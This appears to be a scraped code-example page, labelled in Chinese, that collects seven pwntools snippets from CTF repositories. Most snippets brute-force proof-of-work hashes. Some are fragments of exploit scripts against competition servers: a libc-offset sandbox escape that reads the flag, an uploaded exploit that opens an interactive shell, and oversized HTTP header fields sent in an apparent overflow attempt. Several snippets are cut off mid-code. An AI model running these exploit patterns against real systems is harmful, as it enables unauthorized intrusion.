示例#1
0
文件: remote.py 项目: Hengle/ctf 
def prof(r):
    chal = r.recvline()[:-1]
    x = bruteforce(lambda x: hash(chal + x).startswith('00000'),
                   string.ascii_letters + string.digits,
                   length=4,
                   method='downfrom')
    r.send(x)
示例#2
0
文件: re.py 项目: ares57/ctf 
    elf = f.read()

libc = ELF("./libc.so.6")
idx = elf.find(p64(0x227168 + 0x5cc000 - libc.sym["free"]))

for offset in range(0x5cc000, 0x300000, -0x1000):
    print hex(offset)
    dis = offset + 0x227168 - libc.sym["free"]
    if len(sys.argv) == 2:
        r = remote("39.105.151.182", 9999)
        r.recvuntil("key+\"")
        key = r.recv(10)
        r.recvuntil("==")
        ret = r.recv(4)
        data = bruteforce(lambda x: md5(x + key)[:4] == ret,
                          method="downfrom",
                          length=5,
                          alphabet=pool)
        r.sendline(data)
    else:
        r = remote("127.0.0.1", 1234)
    r.recvuntil("escape the sandbox!")
    payload = elf[:idx] + p64(dis) + elf[idx + 8:]
    try:
        r.sendline(base64.b64encode(payload))
        r.recvuntil("[*] Switching to interactive mode\n")
        r.sendline("cat flag")
        data = r.recvline()
        print data
        if "EOF" in data or "stopped" in data:
            r.close()
        else:
示例#3
0
文件: hack.py 项目: xtrm0/starctf2018 
 def brute_force(prefix,s):
     return bruteforce(lambda x:sha256(x+prefix).hexdigest()==s,string.ascii_letters+string.digits,length=4)
示例#4
0
def pow(prefix,data):
    def f(x):
        return sha256((prefix+x).decode("hex")).hexdigest() == data
    ans = bruteforce(f,pool,length = 3,method= 'fixed')
    return prefix + ans
示例#5
0
import hashlib

context.log_level = "debug"


def hash(x):
    return hashlib.sha256(x).hexdigest()


r = remote("111.186.63.13", 10001)
r.recvuntil("XXXX+")
prefix = r.recvuntil(")")[:-1]
print prefix
r.recvuntil("== ")
result = r.recvline()[:-1]
print result
x = bruteforce(lambda x: hash(x + prefix) == result,
               string.ascii_letters + string.digits,
               length=4,
               method='downfrom')

r.sendline(x)

with open("./exp", "r") as f:
    exp = f.read()

r.sendline(str(len(exp)))
r.send(exp)

r.interactive()
示例#6
0
#heap_add=0
#stack_add=0
def proof_of_work(sol, chal):
    #chal = ''.join(random.choice(string.letters+string.digits) for _ in xrange(16))
    return sha256(chal + sol).hexdigest().startswith('00000')


if len(sys.argv) == 1:
    r = process(pwn_file)
    pid = r.pid
else:
    r = remote("49.4.91.205", 31337)
    prefix = r.recvline()[:-1]
    r.sendline(
        bruteforce(lambda x: proof_of_work(x, prefix),
                   string.letters + string.digits,
                   method='fixed',
                   length=4))
    pid = 0


def debug():
    log.debug("process pid:%d" % pid)
    #log.debug("stack add:0x%x"%stack_add)
    #log.debug("heap add:0x%x"%heap_add)
    #log.debug("libc add:0x%x"%libc.address)
    pause()


r.sendline("get /%s 123" % ("a" * 9999))
r.sendline("HOST: %s" % ("a" * 0x100))
r.sendline("Authorization: %s" % ("a" * 0x100))
示例#7
0
 def solve(prefix):
     return bruteforce(
         lambda x: sha256(prefix + x).digest().startswith("\x00\x00\x00"),
         string.letters + string.digits,
         length=4)